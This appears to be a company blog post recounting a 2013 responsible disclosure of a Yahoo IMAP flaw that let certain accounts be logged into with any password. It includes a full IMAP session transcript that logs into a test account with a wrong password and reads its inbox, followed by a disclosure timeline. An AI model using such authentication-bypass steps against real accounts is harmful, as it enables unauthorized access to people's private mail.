August 23, 2016

Bug blast from the past: Logging in to anyone's Yahoo! account

Back in May 2013 I found a vulnerability in Yahoo's IMAP endpoints which allowed me to access emails for certain accounts using any old password. Whoops!

I found the bug while I was building an iOS email app at my previous job, and looking at how the app responded to incorrect credentials.

Now that I'm more involved in the infosec scene I thought it'd be cool to look back at my first ever experience of doing responsible disclosure. Long-story-short: Yahoo ignored me, fixed it, and a couple months later introduced a bug bounty program. If only I'd held out a little longer! 😭

Watch this thrilling exploit!

In the video below I:

  • log in to a test account using an incorrect password
  • access the inbox, and read the first message in the inbox
  • log out
  • using a different incorrect password, log back in to the same account
  • read the first message again
  • log out
  • log in to a different test account, using an incorrect password

Of the three accounts I had permission to test, the first was created in April 2013, the other two a couple of weeks before that. This issue didn’t affect my colleague who had a much older Yahoo Mail account. I suspect the date the accounts were created had something to do with it. Interestingly even if only new accounts were at risk, Marissa Mayer had only recently joined Yahoo. Access to her account would've been bad news!

Even if only new accounts were at risk, Marissa Mayer had only recently joined Yahoo..."

Nitty gritty detail

Here’s a transcript of the commands I used. Nothing fancy. Just IMAP commands:

$ openssl s_client -host imap.mail.yahoo.com -port 993
CONNECTED(00000003)  
depth=1 /C=US/O=DigiCert Inc/OU=www.digicert.com/CN=DigiCert High Assurance CA-3  
verify error:num=20:unable to get local issuer certificate  
verify return:0  
---
... SSL handshake truncated for brevity ...
    Verify return code: 0 (ok)
---
* OK [CAPABILITY IMAP4rev1 ID NAMESPACE X-ID-ACLID UIDPLUS LITERAL+ CHILDREN XAPPLEPUSHSERVICE XYMHIGHESTMODSEQ AUTH=PLAIN AUTH=LOGIN > AUTH=XYMCOOKIE AUTH=XYMECOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI] IMAP4rev1 imapgate-0.7.68_14.357900 imap402.mail.aue.yahoo.com
1 LOGIN "[email protected]" asdf  
1 OK AUTHENTICATE completed - Mailbox size in bytes is 32815  
2 SELECT INBOX  
* 3 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1366345105] UIDs valid
* OK [UIDNEXT 19] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft)] Permanent flags
* OK [HIGHESTMODSEQ 5875762758974036000]
2 OK [READ-WRITE] SELECT completed; now in selected state  
3 UID SEARCH UNSEEN  
* SEARCH 18 
3 OK UID SEARCH completed  
4 UID FETCH 18 (UID FLAGS RFC822.SIZE ENVELOPE BODY.PEEK[HEADER.FIELDS (References)])  
* 3 FETCH (FLAGS (\Answered) UID 18 RFC822.SIZE 5781 ENVELOPE ("Thu, 9 May 2013 11:58:24 +1200" "Yaahooooo" (("Nick Malcolm" NIL > "nick" "malcolm.net.nz")) (("Nick Malcolm" NIL "nick" "malcolm.net.nz")) (("Nick Malcolm" NIL "nick" "malcolm.net.nz")) (("Mail > Triage" NIL "mailtriageapp" "yahoo.com")) NIL NIL NIL "<[email protected]>") BODY[HEADER.FIELDS (> REFERENCES)] {2}

)
4 OK UID FETCH completed  

You can see, after connecting to Yahoo's IMAP server using openssl, that I log in to the account "[email protected]" with the password asdf. The password was not asdf, and it wasn't any of the other incorrect passwords I attempted. I then opened the Inbox, and read the first unread message.

Yahoo's Response

Here's a timeline of Yahoo's response:

  • May 9 - I emailed them, and received an automated response.
  • May 12 - I notice the vulnerability doesn't work anymore.

Pretty disappointing! I was one of many who found their policy of automated responses to be lacking. I went in to more detail on their automated responses in my original blog post.

Thankfully in October 2013 Tumblr launched their bug bounty program!. It was heartening to see them improve their disclosure policy, because it felt impossible to reach anyone in their security team up until then.

And who knows, if I'd waited I might have been rewarded with a pretty penny: "you will now also be paid for qualifying submissions. These amounts can vary from $250 - $15,000 depending on the severity and complexity of the issue."

Ah well, there's always next time!

ThisData has had a bug bounty since our early, early days, and we love hearing from and working with the security community. We'd love to hear from you too! What bugs have you found recently and how did your disclosure experience go?

Tweet this article!

YOU MAY ALSO BE INTERESTED IN

It wasn’t me!

If you’re a big tech company like Google, Salesforce or Facebook then you’ve already felt the pain of users getting their accounts hacked. Y ...